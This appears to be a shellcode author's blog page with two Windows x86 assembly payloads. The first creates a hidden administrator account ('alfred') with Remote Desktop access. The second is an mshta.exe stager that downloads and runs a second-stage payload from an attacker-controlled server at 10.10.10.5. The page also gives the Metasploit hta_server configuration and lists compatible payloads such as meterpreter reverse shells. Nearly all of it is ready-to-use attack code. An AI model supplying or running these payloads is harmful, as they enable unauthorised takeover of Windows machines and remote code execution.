0xhuesca: 2021

Today’s post demonstrates how to craft a shellcode using the JMP/CALL/POP technique and static addresses of kernel32.dll functions to bypass the small stack space limitation.

Specifically, this Windows x86 shellcode leverages the CreateProcessA API to create a new user and add it to both the ‘Administrators’ and ‘Remote Desktop Users’ groups.

To bypass bad characters, the shellcode alternates the message db string between uppercase and lowercase letters.

In order to bypass the previously outlined constraints, the following shellcode was written based on these design specifications:

Function address of CreateProcessA in kernel32.dll: 0x77082082

Function address of ExitProcess in kernel32.dll: 0x770d214f

Administartor user credentials: alfred:test

Size of message db parameter, 152 bytes -> 0x98 hex = 0x111111A9 - 0x11111111 (0x00 badchar avoidance)

Shellcode Assembly Code:

global _start
section .text

_start:
jmp application

firststep:
pop edi
xor eax, eax
mov esi, 0x111111A9
sub esi, 0x11111111
mov [edi+esi], al                       ; size of message db parameter

StartUpInfoANDProcessInformation:
push eax                                ; hStderror null in this case
push eax                                ; hStdOutput, null
push eax                                ; hStdInput, null
xor ebx, ebx
xor ecx, ecx
add cl, 0x12                            ; 18 times loop to fill both structures.

looper:
push ebx
loop looper
;mov word [esp+0x3c], 0x0101            ; dwflag arg in startupinfo
mov bx, 0x1111
sub bx, 0x1010
mov word [esp+0x3c], bx
mov byte [esp+0x10], 0x44; cb=3D0x44
lea eax, [esp+0x10]                     ; eax points to StartUpInfo
        ; eax holds a pointer to StartUPinfo
        ; esp holds a pointer to Process_Info filled of null values

createprocessA:
push esp                                ; pointer to Process-Info
push eax                                ; pointer to StartUpInfo
xor ebx, ebx
push ebx                                ; null
push ebx                                ; null
push ebx                                ; null
inc ebx
push ebx                                ; bInheritHandles=3Dtrue
dec ebx
push ebx                                ; null
push ebx                                ; null
push edi                                ; pointer to message db string

push ebx                                ; null
mov edx, 0x77082082                     ; CreateProcessA addr in kernel32.dll
call edx

ExitProcess:
push eax                                ; createprocessA return in eax
mov edx, 0x770d214f                     ; ExitProcess addr in kernel32.dll
call edx

application:
call firststep
message db 'c:\windows\system32\cmd.exe /c net user alfred test /add & net localgroup ADMINISTRATORS alfred /add & net localgroup "Remote Desktop Users" alfred /add'

Supplementary Information:

Shellcode Architecture: Windows x86

Shellcode Length: 240 Bytes

Tested on:

Windows 7 Professional 6.1.7601 SP1 Build 7601 (x86)

Windows Vista Ultimate 6.0.6002 SP2 Build 6002 (x86)

Windows Server 2003 Enterprise Edition 5.2.3790 SP1 Build 3790 (x86)

Public Database: https://www.exploit-db.com/shellcodes/49592

In this post, I would like to explore the development of a multi-stage shellcode that utilizes the JMP/CALL/POP technique alongside static kernel32.dll function addresses to bypass small stack space restrictions.

Targeting Windows x86 systems, this shellcode leverages the mshta.exe binary to execute a second-stage payload delivered via Metasploit’s hta_server exploit module.

To avoid bad characters, the shellcode alternates the message db string between uppercase and lowercase letters.

In order to bypass the previously outlined constraints, the following shellcode was written based on these design specifications:

Function address of CreateProcessA in kernel32.dll: 0x75732082

Function address of ExitProcess in kernel32.dll: 0x7578214f

Size in bytes of message db parameter, 65 bytes -> 0x41 hex

Message db contains a strings with the static path windows location of mshta.exe binary and the url obtained from hta_server exploit.

Shellcode Assembly Code:

global _start
section .text

_start:
	jmp application

firststep:
	pop edi
	xor eax, eax
	mov [edi+65], al		; size in bytes of message db parameter

StartUpInfoANDProcessInformation:
	push eax			; hStderror null in this case
	push eax			; hStdOutput, null
	push eax			; hStdInput, null
	xor ebx, ebx
	xor ecx, ecx
	add cl, 0x12			; 18 times loop to fill both structures.

looper:
	push ebx
	loop looper
	;mov word [esp+0x3c], 0x0101	; dwflag arg in startupinfo
	mov bx, 0x1111
	sub bx, 0x1010		
	mov word [esp+0x3c], bx
	mov byte [esp+0x10], 0x44	; cb=0x44
	lea eax, [esp+0x10]		; eax points to StartUpInfo
					; eax has a pointer to StartUPinfo
					; esp has a pointer to Process_Info containing null values

createprocessA:
	push esp			; pointer to Process-Info
	push eax			; pointer to StartUpInfo
	xor ebx, ebx
	push ebx			; null
	push ebx			; null
	push ebx			; null
	inc ebx
	push ebx			; bInheritHandles=true
	dec ebx
	push ebx			; null
	push ebx			; null
	push edi			; pointer to message db string
	push ebx			; null

	mov edx, 0x75732082		; CreateProcessA addr in kernel32.dll
	call edx

ExitProcess:
	push eax			; createprocessA return in eax
	mov edx, 0x7578214f		; ExitProcess addr in kernel32.dll
	call edx

application:
	call firststep
	message db "c:\windows\system32\mshta.exe http://10.10.10.5:8080/2NWyfQ9T.hta"

Upon execution on the victim machine, this shellcode downloads and executes the configured exploit payload from the attacker’s server using the “hta_server” exploit module in Metasploit. Below is provided an example of the “hta_server” exploit configuration:

# msf6 >
# msf6 > use exploit/windows/misc/hta_server (exploit for second stage payload delivery)
# msf6 exploit(windows/misc/hta_server) > set payload windows/exec (a payload from the previously specified list)
# msf6 exploit(windows/misc/hta_server) > set uripath 2NWyfQ9T.hta (a static value for URIPATH)
# msf6 exploit(windows/misc/hta_server) > set CMD calc.exe (command to be executed ex: calc.exe binary)
# msf6 exploit(windows/misc/hta_server) > run	(second stage delivery server execution)

It is important to highlight that, this shellcode is compatible with the following Metasploit's payloads:

generic/custom
generic/debug_trap
generic/shell_bind_tcp
generic/shell_reverse_tcp
generic/tight_loop
windows/dllinject/bind_hidden_ipknock_tcp
windows/dllinject/bind_hidden_tcp
windows/dllinject/bind_ipv6_tcp
windows/dllinject/bind_ipv6_tcp_uuid
windows/dllinject/bind_named_pipe
windows/dllinject/bind_nonx_tcp
windows/dllinject/bind_tcp
windows/dllinject/bind_tcp_rc4
windows/dllinject/bind_tcp_uuid
windows/dllinject/reverse_hop_http
windows/dllinject/reverse_http
windows/dllinject/reverse_http_proxy_pstore
windows/dllinject/reverse_ipv6_tcp
windows/dllinject/reverse_nonx_tcp
windows/dllinject/reverse_ord_tcp
windows/dllinject/reverse_tcp
windows/dllinject/reverse_tcp_allports
windows/dllinject/reverse_tcp_dns
windows/dllinject/reverse_tcp_rc4
windows/dllinject/reverse_tcp_rc4_dns
windows/dllinject/reverse_tcp_uuid
windows/dllinject/reverse_winhttp
windows/dns_txt_query_exec
windows/download_exec
windows/exec
windows/loadlibrary
windows/messagebox
windows/meterpreter/bind_hidden_ipknock_tcp
windows/meterpreter/bind_hidden_tcp
windows/meterpreter/bind_ipv6_tcp
windows/meterpreter/bind_ipv6_tcp_uuid
windows/meterpreter/bind_named_pipe
windows/meterpreter/bind_nonx_tcp
windows/meterpreter/bind_tcp
windows/meterpreter/bind_tcp_rc4
windows/meterpreter/bind_tcp_uuid
windows/meterpreter/reverse_hop_http
windows/meterpreter/reverse_http
windows/meterpreter/reverse_http_proxy_pstore
windows/meterpreter/reverse_https
windows/meterpreter/reverse_https_proxy
windows/meterpreter/reverse_ipv6_tcp
windows/meterpreter/reverse_named_pipe
windows/meterpreter/reverse_nonx_tcp
windows/meterpreter/reverse_ord_tcp
windows/meterpreter/reverse_tcp
windows/meterpreter/reverse_tcp_allports
windows/meterpreter/reverse_tcp_dns
windows/meterpreter/reverse_tcp_rc4
windows/meterpreter/reverse_tcp_rc4_dns
windows/meterpreter/reverse_tcp_uuid
windows/meterpreter/reverse_winhttp
windows/meterpreter/reverse_winhttps
windows/metsvc_bind_tcp
windows/metsvc_reverse_tcp
windows/patchupdllinject/bind_hidden_ipknock_tcp
windows/patchupdllinject/bind_hidden_tcp
windows/patchupdllinject/bind_ipv6_tcp
windows/patchupdllinject/bind_ipv6_tcp_uuid
windows/patchupdllinject/bind_named_pipe
windows/patchupdllinject/bind_nonx_tcp
windows/patchupdllinject/bind_tcp
windows/patchupdllinject/bind_tcp_rc4
windows/patchupdllinject/bind_tcp_uuid
windows/patchupdllinject/reverse_ipv6_tcp
windows/patchupdllinject/reverse_nonx_tcp
windows/patchupdllinject/reverse_ord_tcp
windows/patchupdllinject/reverse_tcp
windows/patchupdllinject/reverse_tcp_allports
windows/patchupdllinject/reverse_tcp_dns
windows/patchupdllinject/reverse_tcp_rc4
windows/patchupdllinject/reverse_tcp_rc4_dns
windows/patchupdllinject/reverse_tcp_uuid
windows/patchupmeterpreter/bind_hidden_ipknock_tcp
windows/patchupmeterpreter/bind_hidden_tcp
windows/patchupmeterpreter/bind_ipv6_tcp
windows/patchupmeterpreter/bind_ipv6_tcp_uuid
windows/patchupmeterpreter/bind_named_pipe
windows/patchupmeterpreter/bind_nonx_tcp
windows/patchupmeterpreter/bind_tcp
windows/patchupmeterpreter/bind_tcp_rc4
windows/patchupmeterpreter/bind_tcp_uuid
windows/patchupmeterpreter/reverse_ipv6_tcp
windows/patchupmeterpreter/reverse_nonx_tcp
windows/patchupmeterpreter/reverse_ord_tcp
windows/patchupmeterpreter/reverse_tcp
windows/patchupmeterpreter/reverse_tcp_allports

Supplementary Information:

Shellcode Architecture: Windows x86

Shellcode Length: 143 Bytes

Tested on:

Windows 7 Professional 6.1.7601 SP1 Build 7601 (x86)

Windows Vista Ultimate 6.0.6002 SP2 Build 6002 (x86)

Windows Server 2003 Enterprise Edition 5.2.3790 SP1 Build 3790 (x86)

Public Database: https://www.exploit-db.com/shellcodes/49466

0xhuesca

Wednesday, February 24, 2021

Shellcode: Windows/x86 - Add User Alfred to Administrators/Remote Desktop Users Group (240 bytes)

Thursday, January 14, 2021

Shellcode: Windows/x86 - Stager Generic MSHTA (143 bytes)

Search This Blog